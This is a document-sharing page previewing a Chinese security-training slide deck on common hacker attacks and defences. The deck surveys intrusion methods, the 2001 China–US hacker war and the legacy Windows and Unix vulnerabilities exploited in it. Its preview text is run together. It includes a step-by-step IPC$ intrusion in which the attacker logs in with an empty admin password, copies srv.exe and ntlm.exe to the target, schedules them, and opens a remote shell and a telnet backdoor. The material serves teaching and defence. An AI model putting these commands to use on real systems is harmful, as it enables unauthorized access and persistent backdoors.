返回
常见黑客攻击与防范

常见黑客攻击与防范

ID:39608780

大小:1.80 MB

页数:76页

时间:2019-07-07

常见黑客攻击与防范_第1页
常见黑客攻击与防范_第2页
常见黑客攻击与防范_第3页
常见黑客攻击与防范_第4页
常见黑客攻击与防范_第5页
资源描述:

《常见黑客攻击与防范》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、常见黑客攻击与防范绿盟科技于慧龙提纲常见的黑客攻击方法常用的安全防范措施常见的黑客攻击方法19801985199019952000密码猜测可自动复制的代码密码破解利用已知的漏洞破坏审计系统后门会话劫持擦除痕迹嗅探包欺骗GUI远程控制自动探测扫描拒绝服务www攻击工具攻击者入侵者水平攻击手法半开放隐蔽扫描控制台入侵检测网络管理DDOS攻击2002高入侵技术的发展采用漏洞扫描工具选择会用的方式入侵获取系统一定权限提升为最高权限安装系统后门获取敏感信息或者其他攻击目的入侵系统的常用步骤端口判断判断系统选择最简

2、方式入侵分析可能有漏洞的服务获取系统一定权限提升为最高权限安装多个系统后门清除入侵脚印攻击其他系统获取敏感信息作为其他用途较高明的入侵步骤2001年中美黑客大战事件背景和经过4.1撞机事件为导火线4月初,以PoizonB0x、pr0phet为代表的美国黑客组织对国内站点进行攻击,约300个左右的站点页面被修改4月下旬,国内红(黑)客组织或个人,开始对美国网站进行小规模的攻击行动,4月26日有人发表了“五一卫国网战”战前声明,宣布将在5月1日至8日,对美国网站进行大规模的攻击行动。各方都得到第三方支援各大

3、媒体纷纷报道,评论,中旬结束大战PoizonB0x、pr0phet更改的网页中经网数据有限公司中国科学院心理研究所国内某政府网站国内某大型商业网站国内黑客组织更改的网站页面美国劳工部网站美国某节点网站美国某大型商业网站美国某政府网站这次事件中采用的常用攻击手法红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下:“我们更多的是一种不满情绪的发泄,大家也可以看到被攻破的都是一些小站,大部分都是NT/Win2000系统,这个行动在技术上是没有任何炫耀和炒作的价值的。”主要采用当时流行

4、的系统漏洞进行攻击这次事件中被利用的典型漏洞用户名泄漏,缺省安装的系统用户名和密码Unicode编码可穿越firewall,执行黑客指令ASP源代码泄露可远程连接的数据库用户名和密码SQLserver缺省安装微软Windows2000登录验证机制可被绕过Bind远程溢出,Lion蠕虫SUNrpc.sadmind远程溢出,sadmin/IIS蠕虫Wu-Ftpd格式字符串错误远程安全漏洞拒绝服务(syn-flood,ping)这次事件中被利用的典型漏洞用户名泄漏,缺省安装的系统用户名和密码入侵者利用黑客工具

5、扫描系统用户获得用户名和简单密码这次事件中被利用的典型漏洞Windows2000登录验证机制可被绕过常见的安全攻击方法直接获取口令进入系统:网络监听,暴力破解利用系统自身安全漏洞特洛伊木马程序:伪装成工具程序或者游戏等诱使用户打开或下载,然后使用户在无意中激活,导致系统后门被安装WWW欺骗:诱使用户访问纂改过的网页电子邮件攻击:邮件炸弹、邮件欺骗网络监听:获取明文传输的敏感信息通过一个节点来攻击其他节点:攻击者控制一台主机后,经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据拒

6、绝服务攻击和分布式拒绝服务攻击(D.o.S和D.D.o.S)一次利用ipc$的入侵过程1.C:>netuse\x.x.x.xIPC$“”/user:“admintitrators”用《流光》扫到的用户名是administrators,密码为“空”的IP地址2.C:>copysrv.exe\x.x.x.xadmin$先复制srv.exe上去,在流光的Tools目录下3.C:>nettime\x.x.x.x查查时间,发现x.x.x.x的当前时间是2003/3/19上午11:00,命令成功完成

7、。4.C:>at\x.x.x.x11:05srv.exe用at命令启动srv.exe吧(这里设置的时间要比主机时间推后)5.C:>nettime\x.x.x.x再查查时间到了没有,如果x.x.x.x的当前时间是2003/3/19上午11:05,那就准备开始下面的命令。6.C:>telnetx.x.x.x99这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了,但是SRV

8、是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了一次利用ipc$的入侵过程7.C:>copyntlm.exe\127.0.0.1admin$ntlm.exe也在《流光》的Tools目录中8.C:WINNTsystem32>ntlm输入ntlm启动(这里的C:WINNTsystem32>是在对方计算机上运行当出现“DONE”的时候,就说明已经启动正常。然后使用“netstarttelne

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。